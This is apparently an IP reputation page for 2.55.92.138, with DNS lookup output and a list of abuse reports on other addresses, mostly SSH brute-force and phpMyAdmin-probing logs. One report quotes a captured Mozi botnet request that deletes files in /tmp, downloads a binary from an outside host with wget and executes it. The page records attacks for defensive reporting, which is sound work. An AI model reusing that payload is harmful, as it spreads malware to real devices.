2.55.92.138 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: Israel

Internet Service Provider: Partner Communications Ltd.

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attackspam	Unauthorized connection attempt from IP address 2.55.92.138 on Port 445(SMB)	2020-07-27 02:04:19

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 2.55.92.138
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 45947
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;2.55.92.138.			IN	A

;; AUTHORITY SECTION:
.			481	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020072601 1800 900 604800 86400

;; Query time: 37 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Jul 27 02:04:14 CST 2020
;; MSG SIZE  rcvd: 115

Host info

138.92.55.2.in-addr.arpa domain name pointer 2-55-92-138.orange.net.il.
138.92.55.2.in-addr.arpa domain name pointer 31-154-92-138.orange.net.il.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
138.92.55.2.in-addr.arpa	name = 31-154-92-138.orange.net.il.
138.92.55.2.in-addr.arpa	name = 2-55-92-138.orange.net.il.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
112.199.118.195	attack	Sep 20 14:07:33 abendstille sshd\[26015\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.199.118.195 user=root Sep 20 14:07:36 abendstille sshd\[26015\]: Failed password for root from 112.199.118.195 port 63320 ssh2 Sep 20 14:12:05 abendstille sshd\[30566\]: Invalid user test from 112.199.118.195 Sep 20 14:12:05 abendstille sshd\[30566\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.199.118.195 Sep 20 14:12:07 abendstille sshd\[30566\]: Failed password for invalid user test from 112.199.118.195 port 62893 ssh2 ...	2020-09-21 02:34:50
51.68.251.202	attackbots	Connection to SSH Honeypot - Detected by HoneypotDB	2020-09-21 02:31:54
184.105.247.194	attackbots	Tried our host z.	2020-09-21 02:03:36
23.108.47.232	attack	Massiver Blogspam (-versuch)	2020-09-21 02:10:35
184.105.247.198	attack	Port scan: Attack repeated for 24 hours	2020-09-21 02:22:07
119.29.182.185	attackbots	Sep 20 15:26:17 h2779839 sshd[11118]: Invalid user www from 119.29.182.185 port 34516 Sep 20 15:26:17 h2779839 sshd[11118]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.29.182.185 Sep 20 15:26:17 h2779839 sshd[11118]: Invalid user www from 119.29.182.185 port 34516 Sep 20 15:26:19 h2779839 sshd[11118]: Failed password for invalid user www from 119.29.182.185 port 34516 ssh2 Sep 20 15:31:07 h2779839 sshd[11214]: Invalid user tf2mgeserver from 119.29.182.185 port 33992 Sep 20 15:31:07 h2779839 sshd[11214]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.29.182.185 Sep 20 15:31:07 h2779839 sshd[11214]: Invalid user tf2mgeserver from 119.29.182.185 port 33992 Sep 20 15:31:10 h2779839 sshd[11214]: Failed password for invalid user tf2mgeserver from 119.29.182.185 port 33992 ssh2 Sep 20 15:36:05 h2779839 sshd[11330]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost ...	2020-09-21 02:31:13
112.85.42.176	attack	Sep 20 20:26:09 abendstille sshd\[4526\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.176 user=root Sep 20 20:26:10 abendstille sshd\[4544\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.176 user=root Sep 20 20:26:11 abendstille sshd\[4526\]: Failed password for root from 112.85.42.176 port 26291 ssh2 Sep 20 20:26:13 abendstille sshd\[4544\]: Failed password for root from 112.85.42.176 port 10992 ssh2 Sep 20 20:26:14 abendstille sshd\[4526\]: Failed password for root from 112.85.42.176 port 26291 ssh2 ...	2020-09-21 02:28:10
192.144.232.129	attack	Banned for a week because repeated abuses, for example SSH, but not only	2020-09-21 02:20:23
185.245.41.228	attackspambots	bruteforce detected	2020-09-21 01:58:15
135.181.89.145	attack	20 attempts against mh-ssh on mist	2020-09-21 02:18:25
74.82.47.57	attack	Found on Github Combined on 3 lists / proto=6 . srcport=60723 . dstport=631 . (1709)	2020-09-21 02:33:38
115.96.167.167	attack	C1,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.96.167.167:48104/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	2020-09-21 02:02:19
217.208.28.66	attackspambots	Port Scan detected! ...	2020-09-21 02:08:54
89.248.172.149	attack	2020/09/20 19:36:02 [error] 22863#22863: 1716966 open() "/usr/share/nginx/html/phpMyAdmin/scripts/setup.php" failed (2: No such file or directory), client: 89.248.172.149, server: _, request: "GET /phpMyAdmin/scripts/setup.php HTTP/1.1", host: "185.118.197.123" 2020/09/20 19:36:02 [error] 22863#22863: 1716967 open() "/usr/share/nginx/html/phpmyadmin/scripts/setup.php" failed (2: No such file or directory), client: 89.248.172.149, server: _, request: "GET /phpmyadmin/scripts/setup.php HTTP/1.1", host: "185.118.197.123" 2020/09/20 19:36:02 [error] 22863#22863: 1716968 open() "/usr/share/nginx/html/pma/scripts/setup.php" failed (2: No such file or directory), client: 89.248.172.149, server: _, request: "GET /pma/scripts/setup.php HTTP/1.1", host: "185.118.197.123" 2020/09/20 19:36:02 [error] 22863#22863: 1716969 open() "/usr/share/nginx/html/myadmin/scripts/setup.php" failed (2: No such file or directory), client: 89.248.172.149, server: _, request: "GET /myadmin/scripts/setup.php HTTP/1.1", host: "185.118.	2020-09-21 02:30:07
194.187.151.237	attack	(sshd) Failed SSH login from 194.187.151.237 (UA/Ukraine/host-194.187.151.237.ardinvest.net): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Sep 20 05:53:25 optimus sshd[3900]: Invalid user pi from 194.187.151.237 Sep 20 05:53:25 optimus sshd[3902]: Invalid user pi from 194.187.151.237 Sep 20 05:53:25 optimus sshd[3900]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=194.187.151.237 Sep 20 05:53:25 optimus sshd[3902]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=194.187.151.237 Sep 20 05:53:27 optimus sshd[3900]: Failed password for invalid user pi from 194.187.151.237 port 41730 ssh2	2020-09-21 02:19:13

Recently Reported IPs

27.27.106.33	128.106.248.162	120.152.174.24	112.198.227.30
43.251.91.224	124.249.85.134	49.134.105.68	41.65.140.230
35.26.13.201	56.77.202.4	111.119.188.11	165.3.86.43
58.186.113.246	1.58.48.94	212.81.58.180	190.78.86.183
95.243.65.80	1.36.101.155	220.135.2.237	111.93.18.166